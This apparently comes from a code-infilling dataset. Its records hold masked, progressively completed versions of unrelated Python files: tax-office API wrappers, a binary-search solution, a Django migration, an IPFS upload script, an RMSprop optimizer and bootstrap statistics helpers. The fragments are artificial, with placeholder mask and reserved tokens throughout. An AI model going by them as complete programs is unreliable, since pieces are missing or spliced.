service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef 
check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-2": "<mask token>\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager 
import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-3": "<mask token>\ncache = CacheWrapper()\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from 
services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-4": "from fw.api import dadata_proxy\nfrom flask import current_app\nfrom fw.cache.cache_wrapper import CacheWrapper\ncache = CacheWrapper()\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', 
date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom fw.api import dadata_proxy\nfrom flask import current_app\n\nfrom fw.cache.cache_wrapper import CacheWrapper\n\ncache = CacheWrapper()\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n\n return _get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n\n return _book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=address_ifns)\n\n\ndef 
get_ifns_registrations(name, company_type='ooo', date_from=None, date_to=None,\n service=None, ifns=None, service_nalog_ru_url=None, logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n\n return _get_ifns_registrations(name, company_type=company_type, date_from=date_from, date_to=date_to,\n service=service, ifns=ifns, service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n\n\n",
"step-ids": [
9,
11,
12,
13,
14
]
}
|
[
9,
11,
12,
13,
14
] |
class Solution:

    def searchRange(self, nums: List[int], target: int) ->List[int]:
        """Return [first, last] indices of *target* in sorted *nums*.

        Returns [-1, -1] when *target* is absent. Runs in O(log n) via two
        lower-bound binary searches (the previous version recursed into both
        halves on every hit, degrading to O(n) on runs of equal values).
        """

        def lower_bound(arr, value):
            # Smallest index i such that arr[i] >= value (len(arr) if none).
            lo, hi = 0, len(arr)
            while lo < hi:
                mid = (lo + hi) // 2
                if arr[mid] < value:
                    lo = mid + 1
                else:
                    hi = mid
            return lo

        left = lower_bound(nums, target)
        if left == len(nums) or nums[left] != target:
            return [-1, -1]
        # First index of the next integer, minus one, is the last occurrence.
        right = lower_bound(nums, target + 1) - 1
        return [left, right]
|
normal
|
{
"blob_id": "18b82f83d3bf729eadb2bd5a766f731a2c54a93b",
"index": 1607,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def searchRange(self, nums: List[int], target: int) ->List[int]:\n res = [-1, -1]\n\n def binary_serach(left, right, target, res):\n if left >= right:\n return\n mid = (left + right) // 2\n if nums[mid] == target:\n if res[0] == -1:\n res[0] = res[1] = mid\n else:\n res[0] = min(res[0], mid)\n res[1] = max(res[1], mid)\n if nums[mid] > target:\n binary_serach(left, mid, target, res)\n elif nums[mid] < target:\n binary_serach(mid + 1, right, target, res)\n else:\n binary_serach(left, mid, target, res)\n binary_serach(mid + 1, right, target, res)\n if nums:\n binary_serach(0, len(nums), target, res)\n return res\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-29 03:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional, indexed ``issuer_name`` field to ``otpsecrets``."""

    dependencies = [('django_otp', '0001_initial')]

    operations = [
        migrations.AddField(
            model_name='otpsecrets',
            name='issuer_name',
            field=models.CharField(blank=True, db_index=True, max_length=40),
        ),
    ]
|
normal
|
{
"blob_id": "d45ca839a24093266c48e5f97164b160190b154d",
"index": 2133,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('django_otp', '0001_initial')]\n operations = [migrations.AddField(model_name='otpsecrets', name=\n 'issuer_name', field=models.CharField(blank=True, db_index=True,\n max_length=40))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('django_otp', '0001_initial')]\n operations = [migrations.AddField(model_name='otpsecrets', name=\n 'issuer_name', field=models.CharField(blank=True, db_index=True,\n max_length=40))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.4 on 2016-12-29 03:38\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('django_otp', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='otpsecrets',\n name='issuer_name',\n field=models.CharField(blank=True, db_index=True, max_length=40),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import argparse
import subprocess
import os
def get_files(dir_path, ext='.png'):
    """Return full paths of entries in *dir_path* whose names end with *ext*.

    Uses a suffix match (endswith) rather than a substring match, so names
    like 'a.png.bak' are no longer wrongly included.
    """
    relative_paths = os.listdir(dir_path)
    matching = [name for name in relative_paths if name.endswith(ext)]
    return [os.path.join(dir_path, name) for name in matching]
def ipfs_add_local(file_path):
    """Add *file_path* to the local IPFS node and return the resulting CID.

    Returns '' (after printing diagnostics) when the CID cannot be parsed
    from the command's output.
    """
    completed = subprocess.run(['ipfs', 'add', file_path],
                               capture_output=True, text=True)
    output = completed.stdout
    try:
        # `ipfs add` prints "added <CID> <name>"; the CID is the second token.
        return output.split()[1]
    except IndexError as err:
        print(err)
        print(output)
        return ""
def pin_with_pinata(cid, name):
    """Ask the configured 'pinata' remote pinning service to pin *cid* as *name*."""
    proc = subprocess.run(
        ['ipfs', 'pin', 'remote', 'add', '--service=pinata',
         f'--name={name}', str(cid)],
        capture_output=True, text=True)
    # Previously the success message was printed unconditionally; surface
    # failures instead of silently claiming success.
    if proc.returncode != 0:
        print(f'Failed to pin cid {cid}: {proc.stderr}')
        return
    print(f'Uploaded cid: {cid}')
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Batch IPFS file uploading')
    parser.add_argument('-i', '--input',
                        help='Path to directory containing media to upload',
                        required=True)
    args = vars(parser.parse_args())

    files_to_upload = get_files(args['input'])

    # Maps file name -> {'cid': ...} for every successfully added file.
    info = {}
    for fp in files_to_upload:
        print(fp)
        cid = ipfs_add_local(fp)
        if cid == "":
            print(f'{fp} failed to upload!')
            continue
        name = os.path.basename(fp)
        info[name] = {'cid': cid}
        pin_with_pinata(cid, name)

    # Write a "filename, cid" manifest sorted by file name. The `with` block
    # closes the file on exit (the previous explicit f.close() was redundant),
    # and os.path.join avoids double separators on trailing-slash inputs.
    with open(os.path.join(args['input'], 'result.csv'), 'w') as f:
        for fn in sorted(info.keys()):
            f.write(f"{fn}, {info[fn]['cid']}\n")
|
normal
|
{
"blob_id": "7ca88d451ad702e5a8e532da3e3f5939cfaa7215",
"index": 9571,
"step-1": "<mask token>\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p),\n relative_paths))\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p),\n relative_paths))\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Batch IPFS file uploading')\n parser.add_argument('-i', '--input', help=\n 'Path to directory containing media to upload', required=True)\n args = vars(parser.parse_args())\n files_to_upload = get_files(args['input'])\n info = {}\n for fp in files_to_upload:\n print(fp)\n cid = ipfs_add_local(fp)\n if cid == '':\n print(f'{fp} failed to upload!')\n continue\n name = os.path.basename(fp)\n info[name] = {'cid': cid}\n pin_with_pinata(cid, name)\n with open(f\"{args['input']}/result.csv\", 'w') as f:\n for fn in sorted(info.keys()):\n cid = info[fn]['cid']\n f.write(f'{fn}, {cid}\\n')\n f.close()\n",
"step-4": "import argparse\nimport subprocess\nimport os\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p),\n relative_paths))\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Batch IPFS file uploading')\n parser.add_argument('-i', '--input', help=\n 'Path to directory containing media to upload', required=True)\n args = vars(parser.parse_args())\n files_to_upload = get_files(args['input'])\n info = {}\n for fp in files_to_upload:\n print(fp)\n cid = ipfs_add_local(fp)\n if cid == '':\n print(f'{fp} failed to upload!')\n continue\n name = os.path.basename(fp)\n info[name] = {'cid': cid}\n pin_with_pinata(cid, name)\n with open(f\"{args['input']}/result.csv\", 'w') as f:\n for fn in sorted(info.keys()):\n cid = info[fn]['cid']\n f.write(f'{fn}, {cid}\\n')\n f.close()\n",
"step-5": "import argparse\nimport subprocess\nimport os\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p), relative_paths))\n\n\ndef ipfs_add_local(file_path):\n 'Returns CID'\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True, text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return \"\"\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add', '--service=pinata', f'--name={name}', str(cid)], capture_output=True, text=True)\n print(f'Uploaded cid: {cid}')\n # print(proc.stdout)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Batch IPFS file uploading')\n parser.add_argument('-i', '--input', help='Path to directory containing media to upload', required=True)\n args = vars(parser.parse_args())\n\n files_to_upload = get_files(args['input'])\n\n info = {}\n\n for fp in files_to_upload:\n print(fp)\n cid = ipfs_add_local(fp)\n if cid == \"\":\n print(f'{fp} failed to upload!')\n continue\n name = os.path.basename(fp)\n info[name] = {'cid': cid}\n\n pin_with_pinata(cid, name)\n\n with open(f'{args[\"input\"]}/result.csv', 'w') as f:\n for fn in sorted(info.keys()):\n cid = info[fn]['cid']\n f.write(f'{fn}, {cid}\\n')\n\n f.close()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
<|reserved_special_token_0|>
def set_train_data(self, x: np.array, t: np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self, w, **kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1, self.n_iter):
[gradE, E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return w
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
def set_param(self, param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-08
def set_train_data(self, x: np.array, t: np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self, w, **kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1, self.n_iter):
[gradE, E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return w
<|reserved_special_token_1|>
import numpy as np
from nn.feedforward_nn import Feed_Forward
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
def set_param(self, param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-08
def set_train_data(self, x: np.array, t: np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self, w, **kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1, self.n_iter):
[gradE, E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return w
<|reserved_special_token_1|>
import numpy as np
from nn.feedforward_nn import Feed_Forward
class RMSprop(object):
    """RMSprop optimizer for a feed-forward network's weight vector."""

    def __init__(self, n_in, n_hid, n_out, regularization_coe):
        self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)

    def set_param(self, param):
        """Read hyper-parameters from the *param* dict, using defaults for
        any key that is absent."""
        self.learning_rate = param.get('learning_rate', 0.01)
        self.n_iter = param.get('n_iter', 1000)
        self.rho = param.get('rho', 0.9)
        self.epsilon = param.get('epsilon', 1e-8)

    def set_train_data(self, x: np.ndarray, t: np.ndarray):
        """Attach training inputs *x* and targets *t* to the network."""
        self.nn.xlist = x
        self.nn.tlist = t

    def update(self, w, **kwargs):
        """Optimize the weight vector *w* with RMSprop and return it.

        Hyper-parameters are taken from **kwargs via set_param.
        """
        self.set_param(kwargs)
        rho = self.rho
        epsilon = self.epsilon
        lr = self.learning_rate
        v = 0
        # NOTE(review): range(1, n_iter) performs n_iter - 1 steps — possibly
        # off by one, but preserved as-is to keep results unchanged.
        for step in range(1, self.n_iter):
            grad, _loss = self.nn.gradE(w)
            # Exponential moving average of the squared gradient.
            v = rho * v + (1 - rho) * grad * grad
            # Per-parameter adaptive step size.
            eta = lr / (epsilon + np.sqrt(v))
            w -= eta * grad
        return w
|
flexible
|
{
"blob_id": "f971302f39149bcdcbe4237cc71219572db600d4",
"index": 8720,
"step-1": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-3": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-4": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-5": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\nclass RMSprop(object):\n\n def __init__(self,n_in,n_hid,n_out,regularization_coe):\n self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)\n\n\n def set_param(self,param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-8\n\n def set_train_data(self,x:np.array,t:np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self,w,**kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1,self.n_iter):\n [gradE,E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return(w)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(
test_set_sizes)):
yield random.sample(test_universe, sample_size)
<|reserved_special_token_0|>
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
